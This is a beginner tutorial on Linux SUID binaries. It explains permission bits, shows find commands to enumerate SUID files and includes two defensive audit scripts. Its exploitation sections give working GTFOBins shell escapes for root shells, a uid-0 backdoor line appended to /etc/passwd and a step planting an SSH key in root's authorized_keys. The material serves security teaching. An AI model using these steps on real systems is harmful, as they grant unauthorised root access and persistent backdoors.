SUID Fundamentals

beginner · 25 min · Writeup

Understanding and finding SUID binaries

Learning Objectives

  • Understand SUID/SGID
  • Find SUID binaries
  • Identify exploitable SUID
  • Use GTFOBins

SUID (Set User ID) is a special permission that makes executables run as their owner rather than the user executing them. When a SUID binary is owned by root, ANY user runs it as root. This legitimate feature becomes a security issue when misused.

Think of SUID like a special badge that says "treat me as the owner." The "passwd" command needs SUID to modify /etc/shadow (owned by root) on behalf of regular users. But give SUID to vim? Now anyone can edit any file as root.

Legitimate vs Dangerous

SUID exists for good reasons (passwd, ping, mount). The danger is when SUID is set on binaries that can execute commands, read files, or spawn shells - those become instant root access.

Understanding SUID

```bash
# Permission bits review
-rwxr-xr-x = Regular executable (755)
-rwsr-xr-x = SUID set (4755) ← Note the 's'
-rwxr-sr-x = SGID set (2755)
-rwsr-sr-x = Both SUID and SGID (6755)

# The 's' replaces 'x' in owner permissions
# Capital 'S' means SUID is set but not executable (broken)

# How SUID works:
1. Regular execution: /usr/bin/cat runs as YOU
2. SUID execution: /usr/bin/passwd runs as ROOT (owner)

# Check SUID status
ls -l /usr/bin/passwd
# -rwsr-xr-x 1 root root ... /usr/bin/passwd
# ^-- 's' means SUID, owned by root = runs as root
```
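Reading the owner, group and other triplets by hand gets error-prone once capital-S and sticky bits appear, so here is an added example (not code from the original page) that decodes the first field of `ls -l` into its octal mode and reports the setuid/setgid state, including the "broken" capital-S case described above. The function name `decode_mode` and the output format are my own choices; the handling of an 11th trailing `.` or `+` (SELinux context / ACL marker that `ls` appends on some systems) is an assumption about that platform convention.

```bash
#!/bin/sh
# Added example: decode an `ls -l` mode string such as "-rwsr-xr-x" into its
# octal value and report whether setuid/setgid are set and whether the bit is
# "broken" (uppercase S/T: special bit set, matching execute bit clear).

# decode_mode MODESTRING
# prints: "<octal> <suid|nosuid> <sgid|nosgid> <ok|broken>"
decode_mode() {
    mode=$1
    case ${#mode} in
        11) perms=${mode#?}; perms=${perms%?} ;;   # strip type char and trailing '.'/'+' (SELinux/ACL marker)
        10) perms=${mode#?} ;;                     # strip the leading type char ('-', 'd', 'l', ...)
        9)  perms=$mode ;;
        *)  printf 'decode_mode: expected 9-11 chars, got "%s"\n' "$mode" >&2; return 1 ;;
    esac

    special=0   # accumulates 4 (setuid), 2 (setgid), 1 (sticky)
    octal=''    # accumulates the three rwx digits
    broken=no   # set when an uppercase S/T is seen
    pos=1
    for cls in u g o; do
        val=0
        for bit in 4 2 1; do
            c=$(printf '%s' "$perms" | cut -c "$pos")
            case $c in
                r|w|x) val=$((val + bit)) ;;
                -)     ;;
                s|S|t|T)
                    # special bits only ever occupy the execute slot (bit value 1)
                    if [ "$bit" -ne 1 ]; then
                        printf 'decode_mode: "%s" in a non-execute slot at position %d\n' "$c" "$pos" >&2
                        return 1
                    fi
                    case "$cls$c" in
                        us|uS) special=$((special + 4)) ;;   # setuid lives in the owner slot
                        gs|gS) special=$((special + 2)) ;;   # setgid lives in the group slot
                        ot|oT) special=$((special + 1)) ;;   # sticky lives in the others slot
                        *)     printf 'decode_mode: "%s" is not valid for class %s\n' "$c" "$cls" >&2; return 1 ;;
                    esac
                    case $c in
                        s|t) val=$((val + 1)) ;;   # lowercase: execute bit is also set
                        S|T) broken=yes ;;          # uppercase: special bit without execute
                    esac ;;
                *)     printf 'decode_mode: unexpected character "%s"\n' "$c" >&2; return 1 ;;
            esac
            pos=$((pos + 1))
        done
        octal="$octal$val"
    done

    if [ "$special" -eq 0 ]; then modestr=$octal; else modestr=$special$octal; fi
    suid=nosuid; [ $((special & 4)) -ne 0 ] && suid=suid
    sgid=nosgid; [ $((special & 2)) -ne 0 ] && sgid=sgid
    state=ok;    [ "$broken" = yes ] && state=broken
    printf '%s %s %s %s\n' "$modestr" "$suid" "$sgid" "$state"
}

# Stand-alone use: pass mode strings as arguments, e.g.
#   sh decode_mode.sh -rwsr-xr-x -rwSr-xr-x
# or feed it the first field of ls -l:
#   sh decode_mode.sh "$(ls -l /usr/bin/passwd | cut -d' ' -f1)"
for m in "$@"; do
    printf '%s -> ' "$m"
    decode_mode "$m"
done
```

The octal it prints is the value you would pass to `find -perm` or `chmod`; a `broken` result means the bit is present but the binary will not execute for that class, which is still worth fixing because a later `chmod +x` would silently re-arm it.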

Real vs Effective UID

```bash
# When you run a SUID binary:
Real UID (RUID) = Your actual user (e.g., 1001)
Effective UID (EUID) = The owner of SUID binary (e.g., 0 for root)

# The EUID is what matters for permission checks
# The binary runs with EUID permissions

# You can see this difference:
id   # Shows your real identity (GNU id also prints euid=... when it differs from the real uid)
# In a SUID context, effective permissions differ
```

Finding SUID Binaries

```bash
# Find all SUID binaries
find / -perm -4000 -type f 2>/dev/null

# Find SUID owned by root specifically
find / -perm -4000 -user root -type f 2>/dev/null

# Also find SGID binaries
find / -perm -2000 -type f 2>/dev/null

# Find both SUID and SGID
find / -perm /6000 -type f 2>/dev/null

# More detailed output
find / -perm -4000 -type f -exec ls -la {} \; 2>/dev/null

# Save to file for analysis
find / -perm -4000 -type f 2>/dev/null > suid_binaries.txt
```

Common Legitimate SUID

```
Normal SUID binaries (expected):
├── /usr/bin/passwd - Change passwords
├── /usr/bin/sudo - Run as other users
├── /usr/bin/su - Switch user
├── /usr/bin/mount - Mount filesystems
├── /usr/bin/umount - Unmount filesystems
├── /usr/bin/ping - Network diagnostics
├── /usr/bin/chsh - Change shell
├── /usr/bin/chfn - Change finger info
├── /usr/bin/newgrp - Change group
└── /usr/bin/gpasswd - Manage groups

These are normal and usually not exploitable.
Look for UNUSUAL binaries or those on GTFOBins.
```

GTFOBins Reference

GTFOBins (gtfobins.github.io) is your bible for SUID exploitation. It lists Unix binaries that can be exploited for privilege escalation when they have SUID or sudo permissions.

```bash
# Common exploitable SUID binaries from GTFOBins:

# find - Execute commands
find . -exec /bin/sh -p \;

# vim/vi - Spawn shell
vim -c ':!/bin/sh'

# less/more - Spawn shell
less /etc/passwd
# Then type: !/bin/sh

# nmap (old versions) - Interactive mode
nmap --interactive
# Then: !sh

# awk - Execute commands
awk 'BEGIN {system("/bin/sh")}'

# python - Spawn shell
python -c 'import os; os.system("/bin/sh")'

# perl - Spawn shell
perl -e 'exec "/bin/sh";'

# bash - Preserved privileges
bash -p

# cp - Overwrite files
# Can copy /etc/passwd with modified root entry
```

Always Check GTFOBins

When you find a SUID binary, immediately check GTFOBins. Even seemingly harmless binaries might have exploitation methods you wouldn't think of.

Basic SUID Exploitation

Shell Escape from Editors

```bash
# vim/vi with SUID
/usr/local/bin/vim       # Assuming this has SUID
:!/bin/sh                # Spawn shell from vim
# Or:
:set shell=/bin/sh
:shell

# less/more with SUID
/usr/local/bin/less /etc/passwd
!/bin/sh                 # Press ! then type command

# nano with SUID
# Ctrl+R to read file, Ctrl+X to execute
# Can read sensitive files at minimum
```

Command Execution

```bash
# find with SUID
./find . -exec /bin/sh -p \;
# -p preserves effective UID

# awk with SUID
./awk 'BEGIN {system("/bin/sh -p")}'

# python with SUID
./python -c 'import os; os.setuid(0); os.system("/bin/sh")'

# perl with SUID
./perl -e 'exec "/bin/sh -p";'

# env with SUID
./env /bin/sh -p

# time with SUID
./time /bin/sh -p
```

File Read/Write

```bash
# cp with SUID - Overwrite /etc/passwd
# Create a new passwd entry with known password
openssl passwd -1 -salt xyz password123
# $1$xyz$pF...hash...

# Append to passwd (if cp doesn't work, try other methods)
echo 'hacker:$1$xyz$pF...hash...:0:0:root:/root:/bin/bash' >> /etc/passwd

# Now login as hacker with password "password123" = root

# Alternative: Copy SSH key to root
mkdir -p /root/.ssh
cp ~/.ssh/id_rsa.pub /root/.ssh/authorized_keys
```

Use -p Flag

Many shells drop privileges when spawned: bash resets its effective UID to the real UID when the two differ. The -p flag (bash -p) preserves the effective UID. Without it, you might get a shell that's back to your normal user!

Identifying Custom SUID

```bash
# Look for unusual SUID binaries:
# 1. Not in /usr/bin or /bin
# 2. Have unusual names
# 3. Recently created

# Find SUID outside the standard binary directories
# (this pattern excludes only /bin, /sbin, /usr/bin and /usr/sbin, so
# /usr/local/bin and /opt still show up in the output)
find / -perm -4000 -type f 2>/dev/null | grep -vE '^/(usr/)?s?bin/'

# Check for custom scripts with SUID
# (Linux ignores the SUID bit on interpreted scripts, but the bit being there
# still points at a misconfiguration worth inspecting)
find / -perm -4000 -name "*.sh" 2>/dev/null

# Recent SUID files
find / -perm -4000 -mtime -7 2>/dev/null   # Modified in last 7 days

# Check what a binary does
file /path/to/suid/binary
strings /path/to/suid/binary | head -50
# Note: when an unprivileged user traces a SUID binary, the kernel does not
# grant it the elevated UID, so ltrace/strace show the code path without the
# root-level effects
ltrace /path/to/suid/binary 2>&1 | head -50
strace /path/to/suid/binary 2>&1 | head -50
```

SUID Enumeration Methodology

SUID Attack Flow

1. Find: `find / -perm -4000 -type f 2>/dev/null`
2. List: Remove known safe binaries from the list
3. Research: Check each unknown binary on GTFOBins
4. Analyze: For custom binaries, use file/strings/strace
5. Exploit: Use the appropriate technique for the binary
6. Verify: Confirm root access with the id command
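Steps 1 to 4 of the flow, together with the earlier Finding SUID Binaries, Common Legitimate SUID, GTFOBins Reference and Identifying Custom SUID sections, can be run as one triage pass. The following is an added example written for this writeup; it is not code from the original page or from GTFOBins. It takes the inventory in the form GNU `find -printf '%p\t%u\t%T@\n'` produces (path, owner, modification time as epoch seconds) and labels each entry `expected`, `review` or `dangerous` with the reasons, which is the list an auditor uses to decide where to remove the bit with `chmod u-s`. The two name lists are the ones given on this page; the standard-directory baseline, the record format and the sample inventory are assumptions, and the sample records are constructed, not taken from a real host.

```bash
#!/bin/sh
# Added example: triage an SUID inventory (path<TAB>owner<TAB>mtime-epoch per
# line, as from: find / -perm -4000 -type f -printf '%p\t%u\t%T@\n').
# Each entry is labelled expected, review or dangerous, with reasons.

# Name lists are the ones on this page. Assumption: extend EXPECTED_NAMES and
# is_standard_dir from a known-good host of the same distribution.
EXPECTED_NAMES=" passwd sudo su mount umount ping chsh chfn newgrp gpasswd "
GTFOBINS_NAMES=" find vim vi less more nano nmap awk python perl bash cp env time "
RECENT_SECONDS=$((7 * 24 * 3600))   # matches the page's -mtime -7 heuristic

# in_list NAME " a b c " -> true if NAME is one of the space-delimited words
in_list() { case $2 in *" $1 "*) return 0 ;; *) return 1 ;; esac; }

# Directories where distribution-managed SUID binaries normally live (assumed baseline)
is_standard_dir() {
    case $1 in
        /bin/*|/sbin/*|/usr/bin/*|/usr/sbin/*|/usr/lib/*|/usr/libexec/*) return 0 ;;
        *) return 1 ;;
    esac
}

reasons=''
add_reason() { reasons="${reasons:+$reasons,}$1"; }

# triage_suid NOW_EPOCH   (records on stdin)
# prints one line per record: <expected|review|dangerous><TAB>path<TAB>reasons
triage_suid() {
    now=$1
    tab=$(printf '\t')
    while IFS=$tab read -r path owner mtime; do
        [ -n "$path" ] || continue
        name=${path##*/}
        mtime=${mtime%.*}          # %T@ carries a fractional part; drop it
        mtime=${mtime:-0}
        reasons=''
        is_standard_dir "$path"   || add_reason nonstandard-path
        [ "$owner" = root ]       || add_reason "owner:$owner"   # runs as that user, not as root
        case $name in *.sh|*.py|*.pl) add_reason script ;; esac  # kernel ignores SUID on scripts; still a misconfig
        [ $((now - mtime)) -ge "$RECENT_SECONDS" ] || add_reason recent

        if in_list "$name" "$GTFOBINS_NAMES"; then
            add_reason "gtfobins:$name"; sev=dangerous            # step 3: known shell-escape binary
        elif in_list "$name" "$EXPECTED_NAMES" && [ -z "$reasons" ]; then
            sev=expected                                          # step 2: known safe, nothing unusual
        elif in_list "$name" "$EXPECTED_NAMES"; then
            add_reason known-name-unusual-attributes; sev=review  # e.g. a "passwd" sitting in /opt
        else
            sev=review                                            # step 4: custom binary, inspect it
        fi
        printf '%s\t%s\t%s\n' "$sev" "$path" "${reasons:--}"
    done
}

# Constructed sample inventory (not from a real host) so the script runs offline
SAMPLE_NOW=1700000000
SAMPLE_RECORDS=$(printf '%s\t%s\t%s\n' \
    /usr/bin/passwd        root 1690000000.000 \
    /usr/bin/find          root 1690000000.000 \
    /usr/local/bin/backup  root 1699900000.000 \
    /opt/tools/passwd      root 1690000000.000 \
    /home/dev/tool.sh      dev  1699990000.000)

triage_sample() { printf '%s\n' "$SAMPLE_RECORDS" | triage_suid "$SAMPLE_NOW"; }

# Run with --live to triage the current host (GNU find), otherwise use the sample
case ${1:-} in
    --live) find / -perm -4000 -type f -printf '%p\t%u\t%T@\n' 2>/dev/null \
                | triage_suid "$(date +%s)" ;;
    *)      triage_sample ;;
esac
```

On the sample inventory the script reports `/usr/bin/find` as `dangerous` (it is on the GTFOBins list from this page even though it sits in a standard directory), flags the recently built `/usr/local/bin/backup` and the non-root-owned `/home/dev/tool.sh` for review, and treats `/usr/bin/passwd` as expected while still sending the copy of `passwd` under `/opt` to the review pile. Name matching is deliberately conservative: a renamed copy of a GTFOBins binary will only show up as `review`, which is why step 4 (file/strings) remains a manual step.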

Knowledge Check

Quick Quiz
Question 1 of 3

What does the 's' in -rwsr-xr-x indicate?

Challenges

Find the SUID

Challenge (beginner)

On a practice machine, find all SUID binaries and identify at least one that can be exploited using GTFOBins.


Key Takeaways

  • SUID makes binaries run as their owner (often root)
  • Find SUID with: find / -perm -4000 2>/dev/null
  • Always check GTFOBins for exploitation methods
  • Use -p flag to preserve privileges in spawned shells
  • Custom SUID binaries are often misconfigured
  • Shell escapes (vim, less) provide root shells from SUID editors